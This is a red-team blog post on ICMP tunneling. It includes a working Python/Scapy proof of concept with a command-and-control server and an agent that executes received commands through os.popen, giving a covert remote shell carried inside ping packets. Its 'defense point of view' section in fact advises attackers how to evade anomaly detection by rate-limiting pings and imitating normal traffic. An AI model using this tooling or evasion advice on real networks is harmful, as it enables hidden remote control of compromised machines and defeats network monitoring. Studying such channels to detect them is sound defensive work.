Ping Power — ICMP Tunnel

Then send it to the proxy server IP address as the destination.Note — This IP is not the destination of the HTTP packet (the IP destination of the HTTP packet will be the IP of )Because airports routers usually allow ICMP traffic out of the network, the router will deliver the Ping message to the proxy server.The proxy server receives the Ping packet, breaks it into 2 parts –The ICMP headers.The payload which contains the original HTTP message.Note — The source IP of the HTTP packet that the proxy sends to Google, should be the IP of the proxy server itself and not the IP of your laptop (or the airport’s router…) because Google should reply back to the proxy and not to you.This might be the most common use of ICMP Tunnel, but as a Red Teamer, I do find it pretty useful as an “under-the-radar” method to evade firewalls and other network policies.All of this is possible because ping messages are allowed to cross the router out of the “Pay-for-WiFi” LAN to the Internet.Why would someone allow this situation to happen?As a former network engineer, I can tell you that ping has a lot of power when trying to understand and solve even the most complicated problems.Most troubleshooting processes begin with testing whether information passes from one point to another..Asking — is this information route possible at all?.are the network components active and are able to respond?Ping messages can answer these questions and many others in the simplest way.These troubleshooting processes occur on a daily basis..It means that the network’s configuration must allow transmission of ping messages on the network from one node to another..Every firewall policies, router policies and Switch ACL (Access List) must allow the flow of ICMP messages from almost any network component to any other.That’s why ping messages will most likely be less affected by network segmentation and policies.Knowing this, it seems to me that in order to create a connection in a network when you need to pass obstacles such as segmentation and network policies — it would be a good idea that agents will connect with the C&C server using ICMP Tunneling.I wrote a simple POC (Proof Of Concept) in python to demonstrate how it works.Note that:– This POC requires you to install Scapy (which is a great tool to learn about anyway)– This POC will not involve handling with fragmentation..Fragmentation will occur, for example, if the answer from the agent will be bigger then the allowed Payload Data size.This POC will involve a C&C server and an agent..Where the C2 server will send the agent commands through an ICMP Tunnel and the agent will return the results, also, through the ICMP!/usr/bin/env python3from scapy.all import *def main(): while True: command = raw_input('# Enter command: ') # build the ICMP packet with the command as the payload pinger = IP(dst="localhost")/ICMP(id=0x0001, seq=0x1)/command send(pinger) # wait for the ICMP message containing the answer from the agent # to be received rx = sniff(count=1, timeout=2) # use this if agent is not on local machine: rx = sniff(filter="icmp", count=1) print(rx[0][Raw].load.decode('utf-8'))if __name__ == "__main__": main()!/usr/bin/env python3import osfrom scapy.all import *def main(): while True: # wait for the ICMP message containing the command from the C2 server # to be received rx = sniff(filter="icmp", count=1) # strip down the packet to the payload itself var = rx[0][Raw].load.decode('utf-8') # run the command and save the result res = os.popen(var).read() # build the ICMP packet with the result as the payload send(IP(dst="localhost")/ICMP(type="echo-reply", id=0x0001, seq=0x1)/res)if __name__ == "__main__": main()Using this will look something like this –And it’s always a good idea to see what’s exactly going on using Wireshark –C2- pwd commandAgent — pwd resultAs you can see — there are 2 ICMP messages, one with the command and one with the result.D.P.O.V (Defense Point of View)It’s important to take a look from the defense point of view and think about what we should take into account when we build this kind of tools.The most important thing to remember is that cybersecurity tools do not start and end with firewall whitelists policies..Most of today’s defense tools will include some kind of anomaly detection functionality.It’s a good way to map out some interesting anomalies by first describing the common behavior of the relevant subject.Talking about ping messages in a regular network, we can assume the following features –Most of ping messages will be sent in the default manner — 4 pings at a time.Ping message is from type 8 (echo ping request) and Ping answer is from type 0 (echo ping reply)There are some fields that are sent with each ping packet (using Windows 8.1) –id = 0x0001seq of the replay will be equal to the seq of the requestThe Payload Data will remain with its default size (32 Bytes) and content — “abcdefghijklmnopqrstuvwabcdefghi”Knowing all the above, you then must consider to –Build the C&C and Agent in a way that there will be no more than 4 ping messages in one batch for every 1 minute (for example)..If the data you need to transfer would take 15 ping messages — it would take it 3 minutes to pass..It may be slow, but if someone or something is looking at this anomaly — it will be worth it.Make sure that the ping request and reply are logically correct..If every ping message you send will be, for example, of type 0 — it would be weird to see a lot of ping replies when there are no ping requests.Try to be as similar as you can be to your surroundings..Do your research.. More details

Leave a Reply